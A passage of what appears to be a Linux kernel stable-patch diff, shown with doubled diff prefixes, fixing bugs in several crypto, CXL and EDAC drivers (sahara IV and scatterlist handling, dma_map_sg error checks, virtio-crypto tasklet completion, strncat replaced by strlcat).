+@@ -916,7 +959,7 @@ static int hisi_zip_show_last_regs_init(struct hisi_qm *qm)
+ 	u32 zip_core_num;
+ 	int i, j, idx;
+ 
+-	zip_core_num = hisi_qm_get_hw_info(qm, zip_basic_cap_info, ZIP_CORE_NUM_CAP, qm->cap_ver);
++	zip_core_num = qm->cap_tables.dev_cap_table[ZIP_CORE_NUM_CAP_IDX].cap_val;
+ 
+ 	debug->last_words = kcalloc(core_dfx_regs_num * zip_core_num + com_dfx_regs_num,
+ 				    sizeof(unsigned int), GFP_KERNEL);
+@@ -972,9 +1015,9 @@ static void hisi_zip_show_last_dfx_regs(struct hisi_qm *qm)
+ 				 hzip_com_dfx_regs[i].name, debug->last_words[i], val);
+ 	}
+ 
+-	zip_core_num = hisi_qm_get_hw_info(qm, zip_basic_cap_info, ZIP_CORE_NUM_CAP, qm->cap_ver);
+-	zip_comp_core_num = hisi_qm_get_hw_info(qm, zip_basic_cap_info, ZIP_CLUSTER_COMP_NUM_CAP,
+-						qm->cap_ver);
++	zip_core_num = qm->cap_tables.dev_cap_table[ZIP_CORE_NUM_CAP_IDX].cap_val;
++	zip_comp_core_num = qm->cap_tables.dev_cap_table[ZIP_CLUSTER_COMP_NUM_CAP_IDX].cap_val;
++
+ 	for (i = 0; i < zip_core_num; i++) {
+ 		if (i < zip_comp_core_num)
+ 			scnprintf(buf, sizeof(buf), "Comp_core-%d", i);
+@@ -1115,6 +1158,10 @@ static int hisi_zip_pf_probe_init(struct hisi_zip *hisi_zip)
+ 	if (ret)
+ 		return ret;
+ 
++	ret = hisi_zip_set_high_perf(qm);
++	if (ret)
++		return ret;
++
+ 	hisi_zip_open_sva_prefetch(qm);
+ 	hisi_qm_dev_err_init(qm);
+ 	hisi_zip_debug_regs_clear(qm);
+@@ -1126,8 +1173,31 @@ static int hisi_zip_pf_probe_init(struct hisi_zip *hisi_zip)
+ 	return ret;
+ }
+ 
++static int zip_pre_store_cap_reg(struct hisi_qm *qm)
++{
++	struct hisi_qm_cap_record *zip_cap;
++	struct pci_dev *pdev = qm->pdev;
++	size_t i, size;
++
++	size = ARRAY_SIZE(zip_pre_store_caps);
++	zip_cap = devm_kzalloc(&pdev->dev, sizeof(*zip_cap) * size, GFP_KERNEL);
++	if (!zip_cap)
++		return -ENOMEM;
++
++	for (i = 0; i < size; i++) {
++		zip_cap[i].type = zip_pre_store_caps[i];
++		zip_cap[i].cap_val = hisi_qm_get_hw_info(qm, zip_basic_cap_info,
++				     zip_pre_store_caps[i], qm->cap_ver);
++	}
++
++	qm->cap_tables.dev_cap_table = zip_cap;
++
++	return 0;
++}
++
+ static int hisi_zip_qm_init(struct hisi_qm *qm, struct pci_dev *pdev)
+ {
++	u64 alg_msk;
+ 	int ret;
+ 
+ 	qm->pdev = pdev;
+@@ -1163,7 +1233,16 @@ static int hisi_zip_qm_init(struct hisi_qm *qm, struct pci_dev *pdev)
+ 		return ret;
+ 	}
+ 
+-	ret = hisi_zip_set_qm_algs(qm);
++	/* Fetch and save the value of capability registers */
++	ret = zip_pre_store_cap_reg(qm);
++	if (ret) {
++		pci_err(qm->pdev, "Failed to pre-store capability registers!\n");
++		hisi_qm_uninit(qm);
++		return ret;
++	}
++
++	alg_msk = qm->cap_tables.dev_cap_table[ZIP_DEV_ALG_BITMAP_IDX].cap_val;
++	ret = hisi_qm_set_algs(qm, alg_msk, zip_dev_algs, ARRAY_SIZE(zip_dev_algs));
+ 	if (ret) {
+ 		pci_err(qm->pdev, "Failed to set zip algs!\n");
+ 		hisi_qm_uninit(qm);
+diff --git a/drivers/crypto/inside-secure/safexcel_cipher.c b/drivers/crypto/inside-secure/safexcel_cipher.c
+index 32a37e3850c58..f59e32115268b 100644
+--- a/drivers/crypto/inside-secure/safexcel_cipher.c
++++ b/drivers/crypto/inside-secure/safexcel_cipher.c
+@@ -742,9 +742,9 @@ static int safexcel_send_req(struct crypto_async_request *base, int ring,
+ 				max(totlen_src, totlen_dst));
+ 			return -EINVAL;
+ 		}
+-		if (sreq->nr_src > 0)
+-			dma_map_sg(priv->dev, src, sreq->nr_src,
+-				   DMA_BIDIRECTIONAL);
++		if (sreq->nr_src > 0 &&
++		    !dma_map_sg(priv->dev, src, sreq->nr_src, DMA_BIDIRECTIONAL))
++			return -EIO;
+ 	} else {
+ 		if (unlikely(totlen_src && (sreq->nr_src <= 0))) {
+ 			dev_err(priv->dev, "Source buffer not large enough (need %d bytes)!",
+@@ -752,8 +752,9 @@ static int safexcel_send_req(struct crypto_async_request *base, int ring,
+ 			return -EINVAL;
+ 		}
+ 
+-		if (sreq->nr_src > 0)
+-			dma_map_sg(priv->dev, src, sreq->nr_src, DMA_TO_DEVICE);
++		if (sreq->nr_src > 0 &&
++		    !dma_map_sg(priv->dev, src, sreq->nr_src, DMA_TO_DEVICE))
++			return -EIO;
+ 
+ 		if (unlikely(totlen_dst && (sreq->nr_dst <= 0))) {
+ 			dev_err(priv->dev, "Dest buffer not large enough (need %d bytes)!",
+@@ -762,9 +763,11 @@ static int safexcel_send_req(struct crypto_async_request *base, int ring,
+ 			goto unmap;
+ 		}
+ 
+-		if (sreq->nr_dst > 0)
+-			dma_map_sg(priv->dev, dst, sreq->nr_dst,
+-				   DMA_FROM_DEVICE);
++		if (sreq->nr_dst > 0 &&
++		    !dma_map_sg(priv->dev, dst, sreq->nr_dst, DMA_FROM_DEVICE)) {
++			ret = -EIO;
++			goto unmap;
++		}
+ 	}
+ 
+ 	memcpy(ctx->base.ctxr->data, ctx->key, ctx->key_len);
+diff --git a/drivers/crypto/sa2ul.c b/drivers/crypto/sa2ul.c
+index f4bc06c24ad8f..e7efebf8127f0 100644
+--- a/drivers/crypto/sa2ul.c
++++ b/drivers/crypto/sa2ul.c
+@@ -1868,9 +1868,8 @@ static int sa_aead_setkey(struct crypto_aead *authenc,
+ 	crypto_aead_set_flags(ctx->fallback.aead,
+ 			      crypto_aead_get_flags(authenc) &
+ 			      CRYPTO_TFM_REQ_MASK);
+-	crypto_aead_setkey(ctx->fallback.aead, key, keylen);
+ 
+-	return 0;
++	return crypto_aead_setkey(ctx->fallback.aead, key, keylen);
+ }
+ 
+ static int sa_aead_setauthsize(struct crypto_aead *tfm, unsigned int authsize)
+diff --git a/drivers/crypto/sahara.c b/drivers/crypto/sahara.c
+index 7ab20fb95166e..3b946f1313ed7 100644
+--- a/drivers/crypto/sahara.c
++++ b/drivers/crypto/sahara.c
+@@ -44,7 +44,6 @@
+ #define FLAGS_MODE_MASK		0x000f
+ #define FLAGS_ENCRYPT		BIT(0)
+ #define FLAGS_CBC		BIT(1)
+-#define FLAGS_NEW_KEY		BIT(3)
+ 
+ #define SAHARA_HDR_BASE			0x00800000
+ #define SAHARA_HDR_SKHA_ALG_AES	0
+@@ -142,8 +141,6 @@ struct sahara_hw_link {
+ };
+ 
+ struct sahara_ctx {
+-	unsigned long flags;
+-
+ 	/* AES-specific context */
+ 	int keylen;
+ 	u8 key[AES_KEYSIZE_128];
+@@ -152,6 +149,7 @@ struct sahara_ctx {
+ 
+ struct sahara_aes_reqctx {
+ 	unsigned long mode;
++	u8 iv_out[AES_BLOCK_SIZE];
+ 	struct skcipher_request fallback_req;	// keep at the end
+ };
+ 
+@@ -447,27 +445,24 @@ static int sahara_hw_descriptor_create(struct sahara_dev *dev)
+ 	int ret;
+ 	int i, j;
+ 	int idx = 0;
++	u32 len;
+ 
+-	/* Copy new key if necessary */
+-	if (ctx->flags & FLAGS_NEW_KEY) {
+-		memcpy(dev->key_base, ctx->key, ctx->keylen);
+-		ctx->flags &= ~FLAGS_NEW_KEY;
++	memcpy(dev->key_base, ctx->key, ctx->keylen);
+ 
+-		if (dev->flags & FLAGS_CBC) {
+-			dev->hw_desc[idx]->len1 = AES_BLOCK_SIZE;
+-			dev->hw_desc[idx]->p1 = dev->iv_phys_base;
+-		} else {
+-			dev->hw_desc[idx]->len1 = 0;
+-			dev->hw_desc[idx]->p1 = 0;
+-		}
+-		dev->hw_desc[idx]->len2 = ctx->keylen;
+-		dev->hw_desc[idx]->p2 = dev->key_phys_base;
+-		dev->hw_desc[idx]->next = dev->hw_phys_desc[1];
++	if (dev->flags & FLAGS_CBC) {
++		dev->hw_desc[idx]->len1 = AES_BLOCK_SIZE;
++		dev->hw_desc[idx]->p1 = dev->iv_phys_base;
++	} else {
++		dev->hw_desc[idx]->len1 = 0;
++		dev->hw_desc[idx]->p1 = 0;
++	}
++	dev->hw_desc[idx]->len2 = ctx->keylen;
++	dev->hw_desc[idx]->p2 = dev->key_phys_base;
++	dev->hw_desc[idx]->next = dev->hw_phys_desc[1];
++	dev->hw_desc[idx]->hdr = sahara_aes_key_hdr(dev);
+ 
+-		dev->hw_desc[idx]->hdr = sahara_aes_key_hdr(dev);
++	idx++;
+ 
+-		idx++;
+-	}
+ 
+ 	dev->nb_in_sg = sg_nents_for_len(dev->in_sg, dev->total);
+ 	if (dev->nb_in_sg < 0) {
+@@ -489,24 +484,27 @@ static int sahara_hw_descriptor_create(struct sahara_dev *dev)
+ 			 DMA_TO_DEVICE);
+ 	if (!ret) {
+ 		dev_err(dev->device, "couldn't map in sg\n");
+-		goto unmap_in;
++		return -EINVAL;
+ 	}
++
+ 	ret = dma_map_sg(dev->device, dev->out_sg, dev->nb_out_sg,
+ 			 DMA_FROM_DEVICE);
+ 	if (!ret) {
+ 		dev_err(dev->device, "couldn't map out sg\n");
+-		goto unmap_out;
++		goto unmap_in;
+ 	}
+ 
+ 	/* Create input links */
+ 	dev->hw_desc[idx]->p1 = dev->hw_phys_link[0];
+ 	sg = dev->in_sg;
++	len = dev->total;
+ 	for (i = 0; i < dev->nb_in_sg; i++) {
+-		dev->hw_link[i]->len = sg->length;
++		dev->hw_link[i]->len = min(len, sg->length);
+ 		dev->hw_link[i]->p = sg->dma_address;
+ 		if (i == (dev->nb_in_sg - 1)) {
+ 			dev->hw_link[i]->next = 0;
+ 		} else {
++			len -= min(len, sg->length);
+ 			dev->hw_link[i]->next = dev->hw_phys_link[i + 1];
+ 			sg = sg_next(sg);
+ 		}
+@@ -515,12 +513,14 @@ static int sahara_hw_descriptor_create(struct sahara_dev *dev)
+ 	/* Create output links */
+ 	dev->hw_desc[idx]->p2 = dev->hw_phys_link[i];
+ 	sg = dev->out_sg;
++	len = dev->total;
+ 	for (j = i; j < dev->nb_out_sg + i; j++) {
+-		dev->hw_link[j]->len = sg->length;
++		dev->hw_link[j]->len = min(len, sg->length);
+ 		dev->hw_link[j]->p = sg->dma_address;
+ 		if (j == (dev->nb_out_sg + i - 1)) {
+ 			dev->hw_link[j]->next = 0;
+ 		} else {
++			len -= min(len, sg->length);
+ 			dev->hw_link[j]->next = dev->hw_phys_link[j + 1];
+ 			sg = sg_next(sg);
+ 		}
+@@ -539,9 +539,6 @@ static int sahara_hw_descriptor_create(struct sahara_dev *dev)
+ 
+ 	return 0;
+ 
+-unmap_out:
+-	dma_unmap_sg(dev->device, dev->out_sg, dev->nb_out_sg,
+-		DMA_FROM_DEVICE);
+ unmap_in:
+ 	dma_unmap_sg(dev->device, dev->in_sg, dev->nb_in_sg,
+ 		DMA_TO_DEVICE);
+@@ -549,8 +546,24 @@ unmap_in:
+ 	return -EINVAL;
+ }
+ 
++static void sahara_aes_cbc_update_iv(struct skcipher_request *req)
++{
++	struct crypto_skcipher *skcipher = crypto_skcipher_reqtfm(req);
++	struct sahara_aes_reqctx *rctx = skcipher_request_ctx(req);
++	unsigned int ivsize = crypto_skcipher_ivsize(skcipher);
++
++	/* Update IV buffer to contain the last ciphertext block */
++	if (rctx->mode & FLAGS_ENCRYPT) {
++		sg_pcopy_to_buffer(req->dst, sg_nents(req->dst), req->iv,
++				   ivsize, req->cryptlen - ivsize);
++	} else {
++		memcpy(req->iv, rctx->iv_out, ivsize);
++	}
++}
++
+ static int sahara_aes_process(struct skcipher_request *req)
+ {
++	struct crypto_skcipher *skcipher = crypto_skcipher_reqtfm(req);
+ 	struct sahara_dev *dev = dev_ptr;
+ 	struct sahara_ctx *ctx;
+ 	struct sahara_aes_reqctx *rctx;
+@@ -572,8 +585,17 @@ static int sahara_aes_process(struct skcipher_request *req)
+ 	rctx->mode &= FLAGS_MODE_MASK;
+ 	dev->flags = (dev->flags & ~FLAGS_MODE_MASK) | rctx->mode;
+ 
+-	if ((dev->flags & FLAGS_CBC) && req->iv)
+-		memcpy(dev->iv_base, req->iv, AES_KEYSIZE_128);
++	if ((dev->flags & FLAGS_CBC) && req->iv) {
++		unsigned int ivsize = crypto_skcipher_ivsize(skcipher);
++
++		memcpy(dev->iv_base, req->iv, ivsize);
++
++		if (!(dev->flags & FLAGS_ENCRYPT)) {
++			sg_pcopy_to_buffer(req->src, sg_nents(req->src),
++					   rctx->iv_out, ivsize,
++					   req->cryptlen - ivsize);
++		}
++	}
+ 
+ 	/* assign new context to device */
+ 	dev->ctx = ctx;
+@@ -586,16 +608,20 @@ static int sahara_aes_process(struct skcipher_request *req)
+ 
+ 	timeout = wait_for_completion_timeout(&dev->dma_completion,
+ 				msecs_to_jiffies(SAHARA_TIMEOUT_MS));
+-	if (!timeout) {
+-		dev_err(dev->device, "AES timeout\n");
+-		return -ETIMEDOUT;
+-	}
+ 
+ 	dma_unmap_sg(dev->device, dev->out_sg, dev->nb_out_sg,
+ 		DMA_FROM_DEVICE);
+ 	dma_unmap_sg(dev->device, dev->in_sg, dev->nb_in_sg,
+ 		DMA_TO_DEVICE);
+ 
++	if (!timeout) {
++		dev_err(dev->device, "AES timeout\n");
++		return -ETIMEDOUT;
++	}
++
++	if ((dev->flags & FLAGS_CBC) && req->iv)
++		sahara_aes_cbc_update_iv(req);
++
+ 	return 0;
+ }
+ 
+@@ -609,7 +635,6 @@ static int sahara_aes_setkey(struct crypto_skcipher *tfm, const u8 *key,
+ 	/* SAHARA only supports 128bit keys */
+ 	if (keylen == AES_KEYSIZE_128) {
+ 		memcpy(ctx->key, key, keylen);
+-		ctx->flags |= FLAGS_NEW_KEY;
+ 		return 0;
+ 	}
+ 
+@@ -625,12 +650,40 @@ static int sahara_aes_setkey(struct crypto_skcipher *tfm, const u8 *key,
+ 	return crypto_skcipher_setkey(ctx->fallback, key, keylen);
+ }
+ 
++static int sahara_aes_fallback(struct skcipher_request *req, unsigned long mode)
++{
++	struct sahara_aes_reqctx *rctx = skcipher_request_ctx(req);
++	struct sahara_ctx *ctx = crypto_skcipher_ctx(
++		crypto_skcipher_reqtfm(req));
++
++	skcipher_request_set_tfm(&rctx->fallback_req, ctx->fallback);
++	skcipher_request_set_callback(&rctx->fallback_req,
++				      req->base.flags,
++				      req->base.complete,
++				      req->base.data);
++	skcipher_request_set_crypt(&rctx->fallback_req, req->src,
++				   req->dst, req->cryptlen, req->iv);
++
++	if (mode & FLAGS_ENCRYPT)
++		return crypto_skcipher_encrypt(&rctx->fallback_req);
++
++	return crypto_skcipher_decrypt(&rctx->fallback_req);
++}
++
+ static int sahara_aes_crypt(struct skcipher_request *req, unsigned long mode)
+ {
+ 	struct sahara_aes_reqctx *rctx = skcipher_request_ctx(req);
++	struct sahara_ctx *ctx = crypto_skcipher_ctx(
++		crypto_skcipher_reqtfm(req));
+ 	struct sahara_dev *dev = dev_ptr;
+ 	int err = 0;
+ 
++	if (!req->cryptlen)
++		return 0;
++
++	if (unlikely(ctx->keylen != AES_KEYSIZE_128))
++		return sahara_aes_fallback(req, mode);
++
+ 	dev_dbg(dev->device, "nbytes: %d, enc: %d, cbc: %d\n",
+ 		req->cryptlen, !!(mode & FLAGS_ENCRYPT), !!(mode & FLAGS_CBC));
+ 
+@@ -653,81 +706,21 @@ static int sahara_aes_crypt(struct skcipher_request *req, unsigned long mode)
+ 
+ static int sahara_aes_ecb_encrypt(struct skcipher_request *req)
+ {
+-	struct sahara_aes_reqctx *rctx = skcipher_request_ctx(req);
+-	struct sahara_ctx *ctx = crypto_skcipher_ctx(
+-		crypto_skcipher_reqtfm(req));
+-
+-	if (unlikely(ctx->keylen != AES_KEYSIZE_128)) {
+-		skcipher_request_set_tfm(&rctx->fallback_req, ctx->fallback);
+-		skcipher_request_set_callback(&rctx->fallback_req,
+-					      req->base.flags,
+-					      req->base.complete,
+-					      req->base.data);
+-		skcipher_request_set_crypt(&rctx->fallback_req, req->src,
+-					   req->dst, req->cryptlen, req->iv);
+-		return crypto_skcipher_encrypt(&rctx->fallback_req);
+-	}
+-
+ 	return sahara_aes_crypt(req, FLAGS_ENCRYPT);
+ }
+ 
+ static int sahara_aes_ecb_decrypt(struct skcipher_request *req)
+ {
+-	struct sahara_aes_reqctx *rctx = skcipher_request_ctx(req);
+-	struct sahara_ctx *ctx = crypto_skcipher_ctx(
+-		crypto_skcipher_reqtfm(req));
+-
+-	if (unlikely(ctx->keylen != AES_KEYSIZE_128)) {
+-		skcipher_request_set_tfm(&rctx->fallback_req, ctx->fallback);
+-		skcipher_request_set_callback(&rctx->fallback_req,
+-					      req->base.flags,
+-					      req->base.complete,
+-					      req->base.data);
+-		skcipher_request_set_crypt(&rctx->fallback_req, req->src,
+-					   req->dst, req->cryptlen, req->iv);
+-		return crypto_skcipher_decrypt(&rctx->fallback_req);
+-	}
+-
+ 	return sahara_aes_crypt(req, 0);
+ }
+ 
+ static int sahara_aes_cbc_encrypt(struct skcipher_request *req)
+ {
+-	struct sahara_aes_reqctx *rctx = skcipher_request_ctx(req);
+-	struct sahara_ctx *ctx = crypto_skcipher_ctx(
+-		crypto_skcipher_reqtfm(req));
+-
+-	if (unlikely(ctx->keylen != AES_KEYSIZE_128)) {
+-		skcipher_request_set_tfm(&rctx->fallback_req, ctx->fallback);
+-		skcipher_request_set_callback(&rctx->fallback_req,
+-					      req->base.flags,
+-					      req->base.complete,
+-					      req->base.data);
+-		skcipher_request_set_crypt(&rctx->fallback_req, req->src,
+-					   req->dst, req->cryptlen, req->iv);
+-		return crypto_skcipher_encrypt(&rctx->fallback_req);
+-	}
+-
+ 	return sahara_aes_crypt(req, FLAGS_ENCRYPT | FLAGS_CBC);
+ }
+ 
+ static int sahara_aes_cbc_decrypt(struct skcipher_request *req)
+ {
+-	struct sahara_aes_reqctx *rctx = skcipher_request_ctx(req);
+-	struct sahara_ctx *ctx = crypto_skcipher_ctx(
+-		crypto_skcipher_reqtfm(req));
+-
+-	if (unlikely(ctx->keylen != AES_KEYSIZE_128)) {
+-		skcipher_request_set_tfm(&rctx->fallback_req, ctx->fallback);
+-		skcipher_request_set_callback(&rctx->fallback_req,
+-					      req->base.flags,
+-					      req->base.complete,
+-					      req->base.data);
+-		skcipher_request_set_crypt(&rctx->fallback_req, req->src,
+-					   req->dst, req->cryptlen, req->iv);
+-		return crypto_skcipher_decrypt(&rctx->fallback_req);
+-	}
+-
+ 	return sahara_aes_crypt(req, FLAGS_CBC);
+ }
+ 
+@@ -784,6 +777,7 @@ static int sahara_sha_hw_links_create(struct sahara_dev *dev,
+ 				       int start)
+ {
+ 	struct scatterlist *sg;
++	unsigned int len;
+ 	unsigned int i;
+ 	int ret;
+ 
+@@ -805,12 +799,14 @@ static int sahara_sha_hw_links_create(struct sahara_dev *dev,
+ 	if (!ret)
+ 		return -EFAULT;
+ 
++	len = rctx->total;
+ 	for (i = start; i < dev->nb_in_sg + start; i++) {
+-		dev->hw_link[i]->len = sg->length;
++		dev->hw_link[i]->len = min(len, sg->length);
+ 		dev->hw_link[i]->p = sg->dma_address;
+ 		if (i == (dev->nb_in_sg + start - 1)) {
+ 			dev->hw_link[i]->next = 0;
+ 		} else {
++			len -= min(len, sg->length);
+ 			dev->hw_link[i]->next = dev->hw_phys_link[i + 1];
+ 			sg = sg_next(sg);
+ 		}
+@@ -891,24 +887,6 @@ static int sahara_sha_hw_context_descriptor_create(struct sahara_dev *dev,
+ 	return 0;
+ }
+ 
+-static int sahara_walk_and_recalc(struct scatterlist *sg, unsigned int nbytes)
+-{
+-	if (!sg || !sg->length)
+-		return nbytes;
+-
+-	while (nbytes && sg) {
+-		if (nbytes <= sg->length) {
+-			sg->length = nbytes;
+-			sg_mark_end(sg);
+-			break;
+-		}
+-		nbytes -= sg->length;
+-		sg = sg_next(sg);
+-	}
+-
+-	return nbytes;
+-}
+-
+ static int sahara_sha_prepare_request(struct ahash_request *req)
+ {
+ 	struct crypto_ahash *tfm = crypto_ahash_reqtfm(req);
+@@ -945,36 +923,20 @@ static int sahara_sha_prepare_request(struct ahash_request *req)
+ 					hash_later, 0);
+ 	}
+ 
+-	/* nbytes should now be multiple of blocksize */
+-	req->nbytes = req->nbytes - hash_later;
+-
+-	sahara_walk_and_recalc(req->src, req->nbytes);
+-
++	rctx->total = len - hash_later;
+ 	/* have data from previous operation and current */
+ 	if (rctx->buf_cnt && req->nbytes) {
+ 		sg_init_table(rctx->in_sg_chain, 2);
+ 		sg_set_buf(rctx->in_sg_chain, rctx->rembuf, rctx->buf_cnt);
+-
+ 		sg_chain(rctx->in_sg_chain, 2, req->src);
+-
+-		rctx->total = req->nbytes + rctx->buf_cnt;
+ 		rctx->in_sg = rctx->in_sg_chain;
+-
+-		req->src = rctx->in_sg_chain;
+ 	/* only data from previous operation */
+ 	} else if (rctx->buf_cnt) {
+-		if (req->src)
+-			rctx->in_sg = req->src;
+-		else
+-			rctx->in_sg = rctx->in_sg_chain;
+-		/* buf was copied into rembuf above */
++		rctx->in_sg = rctx->in_sg_chain;
+ 		sg_init_one(rctx->in_sg, rctx->rembuf, rctx->buf_cnt);
+-		rctx->total = rctx->buf_cnt;
+ 	/* no data from previous operation */
+ 	} else {
+ 		rctx->in_sg = req->src;
+-		rctx->total = req->nbytes;
+-		req->src = rctx->in_sg;
+ 	}
+ 
+ 	/* on next call, we only have the remaining data in the buffer */
+@@ -995,7 +957,10 @@ static int sahara_sha_process(struct ahash_request *req)
+ 		return ret;
+ 
+ 	if (rctx->first) {
+-		sahara_sha_hw_data_descriptor_create(dev, rctx, req, 0);
++		ret = sahara_sha_hw_data_descriptor_create(dev, rctx, req, 0);
++		if (ret)
++			return ret;
++
+ 		dev->hw_desc[0]->next = 0;
+ 		rctx->first = 0;
+ 	} else {
+@@ -1003,7 +968,10 @@ static int sahara_sha_process(struct ahash_request *req)
+ 
+ 		sahara_sha_hw_context_descriptor_create(dev, rctx, req, 0);
+ 		dev->hw_desc[0]->next = dev->hw_phys_desc[1];
+-		sahara_sha_hw_data_descriptor_create(dev, rctx, req, 1);
++		ret = sahara_sha_hw_data_descriptor_create(dev, rctx, req, 1);
++		if (ret)
++			return ret;
++
+ 		dev->hw_desc[1]->next = 0;
+ 	}
+ 
+@@ -1016,18 +984,19 @@ static int sahara_sha_process(struct ahash_request *req)
+ 
+ 	timeout = wait_for_completion_timeout(&dev->dma_completion,
+ 				msecs_to_jiffies(SAHARA_TIMEOUT_MS));
+-	if (!timeout) {
+-		dev_err(dev->device, "SHA timeout\n");
+-		return -ETIMEDOUT;
+-	}
+ 
+ 	if (rctx->sg_in_idx)
+ 		dma_unmap_sg(dev->device, dev->in_sg, dev->nb_in_sg,
+ 			     DMA_TO_DEVICE);
+ 
++	if (!timeout) {
++		dev_err(dev->device, "SHA timeout\n");
++		return -ETIMEDOUT;
++	}
++
+ 	memcpy(rctx->context, dev->context_base, rctx->context_size);
+ 
+-	if (req->result)
++	if (req->result && rctx->last)
+ 		memcpy(req->result, rctx->context, rctx->digest_size);
+ 
+ 	return 0;
+@@ -1171,8 +1140,7 @@ static int sahara_sha_import(struct ahash_request *req, const void *in)
+ static int sahara_sha_cra_init(struct crypto_tfm *tfm)
+ {
+ 	crypto_ahash_set_reqsize(__crypto_ahash_cast(tfm),
+-				 sizeof(struct sahara_sha_reqctx) +
+-				 SHA_BUFFER_LEN + SHA256_BLOCK_SIZE);
++				 sizeof(struct sahara_sha_reqctx));
+ 
+ 	return 0;
+ }
+diff --git a/drivers/crypto/virtio/virtio_crypto_common.h b/drivers/crypto/virtio/virtio_crypto_common.h
+index 154590e1f7643..7059bbe5a2eba 100644
+--- a/drivers/crypto/virtio/virtio_crypto_common.h
++++ b/drivers/crypto/virtio/virtio_crypto_common.h
+@@ -10,6 +10,7 @@
+ #include <linux/virtio.h>
+ #include <linux/crypto.h>
+ #include <linux/spinlock.h>
++#include <linux/interrupt.h>
+ #include <crypto/aead.h>
+ #include <crypto/aes.h>
+ #include <crypto/engine.h>
+@@ -28,6 +29,7 @@ struct data_queue {
+ 	char name[32];
+ 
+ 	struct crypto_engine *engine;
++	struct tasklet_struct done_task;
+ };
+ 
+ struct virtio_crypto {
+diff --git a/drivers/crypto/virtio/virtio_crypto_core.c b/drivers/crypto/virtio/virtio_crypto_core.c
+index 3842915ea7437..56dc0935c774a 100644
+--- a/drivers/crypto/virtio/virtio_crypto_core.c
++++ b/drivers/crypto/virtio/virtio_crypto_core.c
+@@ -72,27 +72,28 @@ int virtio_crypto_ctrl_vq_request(struct virtio_crypto *vcrypto, struct scatterl
+ 	return 0;
+ }
+ 
+-static void virtcrypto_dataq_callback(struct virtqueue *vq)
++static void virtcrypto_done_task(unsigned long data)
+ {
+-	struct virtio_crypto *vcrypto = vq->vdev->priv;
++	struct data_queue *data_vq = (struct data_queue *)data;
++	struct virtqueue *vq = data_vq->vq;
+ 	struct virtio_crypto_request *vc_req;
+-	unsigned long flags;
+ 	unsigned int len;
+-	unsigned int qid = vq->index;
+ 
+-	spin_lock_irqsave(&vcrypto->data_vq[qid].lock, flags);
+ 	do {
+ 		virtqueue_disable_cb(vq);
+ 		while ((vc_req = virtqueue_get_buf(vq, &len)) != NULL) {
+-			spin_unlock_irqrestore(
+-				&vcrypto->data_vq[qid].lock, flags);
+ 			if (vc_req->alg_cb)
+ 				vc_req->alg_cb(vc_req, len);
+-			spin_lock_irqsave(
+-				&vcrypto->data_vq[qid].lock, flags);
+ 		}
+ 	} while (!virtqueue_enable_cb(vq));
+-	spin_unlock_irqrestore(&vcrypto->data_vq[qid].lock, flags);
++}
++
++static void virtcrypto_dataq_callback(struct virtqueue *vq)
++{
++	struct virtio_crypto *vcrypto = vq->vdev->priv;
++	struct data_queue *dq = &vcrypto->data_vq[vq->index];
++
++	tasklet_schedule(&dq->done_task);
+ }
+ 
+ static int virtcrypto_find_vqs(struct virtio_crypto *vi)
+@@ -150,6 +151,8 @@ static int virtcrypto_find_vqs(struct virtio_crypto *vi)
+ 			ret = -ENOMEM;
+ 			goto err_engine;
+ 		}
++		tasklet_init(&vi->data_vq[i].done_task, virtcrypto_done_task,
++				(unsigned long)&vi->data_vq[i]);
+ 	}
+ 
+ 	kfree(names);
+@@ -496,12 +499,15 @@ static void virtcrypto_free_unused_reqs(struct virtio_crypto *vcrypto)
+ static void virtcrypto_remove(struct virtio_device *vdev)
+ {
+ 	struct virtio_crypto *vcrypto = vdev->priv;
++	int i;
+ 
+ 	dev_info(&vdev->dev, "Start virtcrypto_remove.\n");
+ 
+ 	flush_work(&vcrypto->config_work);
+ 	if (virtcrypto_dev_started(vcrypto))
+ 		virtcrypto_dev_stop(vcrypto);
++	for (i = 0; i < vcrypto->max_data_queues; i++)
++		tasklet_kill(&vcrypto->data_vq[i].done_task);
+ 	virtio_reset_device(vdev);
+ 	virtcrypto_free_unused_reqs(vcrypto);
+ 	virtcrypto_clear_crypto_engines(vcrypto);
+diff --git a/drivers/cxl/core/port.c b/drivers/cxl/core/port.c
+index bd41424319807..1f1483a9e5252 100644
+--- a/drivers/cxl/core/port.c
++++ b/drivers/cxl/core/port.c
+@@ -1403,7 +1403,7 @@ static int decoder_populate_targets(struct cxl_switch_decoder *cxlsd,
+ 		return -EINVAL;
+ 
+ 	write_seqlock(&cxlsd->target_lock);
+-	for (i = 0; i < cxlsd->nr_targets; i++) {
++	for (i = 0; i < cxlsd->cxld.interleave_ways; i++) {
+ 		struct cxl_dport *dport = find_dport(port, target_map[i]);
+ 
+ 		if (!dport) {
+diff --git a/drivers/cxl/core/region.c b/drivers/cxl/core/region.c
+index ebc1b028555ca..2f7187dbfa2d9 100644
+--- a/drivers/cxl/core/region.c
++++ b/drivers/cxl/core/region.c
+@@ -331,7 +331,7 @@ static ssize_t interleave_ways_store(struct device *dev,
+ 		return rc;
+ 
+ 	/*
+-	 * Even for x3, x9, and x12 interleaves the region interleave must be a
++	 * Even for x3, x6, and x12 interleaves the region interleave must be a
+ 	 * power of 2 multiple of the host bridge interleave.
+ 	 */
+ 	if (!is_power_of_2(val / cxld->interleave_ways) ||
+diff --git a/drivers/edac/thunderx_edac.c b/drivers/edac/thunderx_edac.c
+index f13674081cb6b..4dca21b39bf73 100644
+--- a/drivers/edac/thunderx_edac.c
++++ b/drivers/edac/thunderx_edac.c
+@@ -1133,7 +1133,7 @@ static irqreturn_t thunderx_ocx_com_threaded_isr(int irq, void *irq_id)
+ 		decode_register(other, OCX_OTHER_SIZE,
+ 				ocx_com_errors, ctx->reg_com_int);
+ 
+-		strncat(msg, other, OCX_MESSAGE_SIZE);
++		strlcat(msg, other, OCX_MESSAGE_SIZE);
+ 
+ 		for (lane = 0; lane < OCX_RX_LANES; lane++)
+ 			if (ctx->reg_com_int & BIT(lane)) {
+@@ -1142,12 +1142,12 @@ static irqreturn_t thunderx_ocx_com_threaded_isr(int irq, void *irq_id)
+ 					 lane, ctx->reg_lane_int[lane],
+ 					 lane, ctx->reg_lane_stat11[lane]);
+ 
+-				strncat(msg, other, OCX_MESSAGE_SIZE);
++				strlcat(msg, other, OCX_MESSAGE_SIZE);
+ 
+ 				decode_register(other, OCX_OTHER_SIZE,
+ 						ocx_lane_errors,
+ 						ctx->reg_lane_int[lane]);
+-				strncat(msg, other, OCX_MESSAGE_SIZE);
++				strlcat(msg, other, OCX_MESSAGE_SIZE);
+ 			}
+ 
+ 		if (ctx->reg_com_int & OCX_COM_INT_CE)
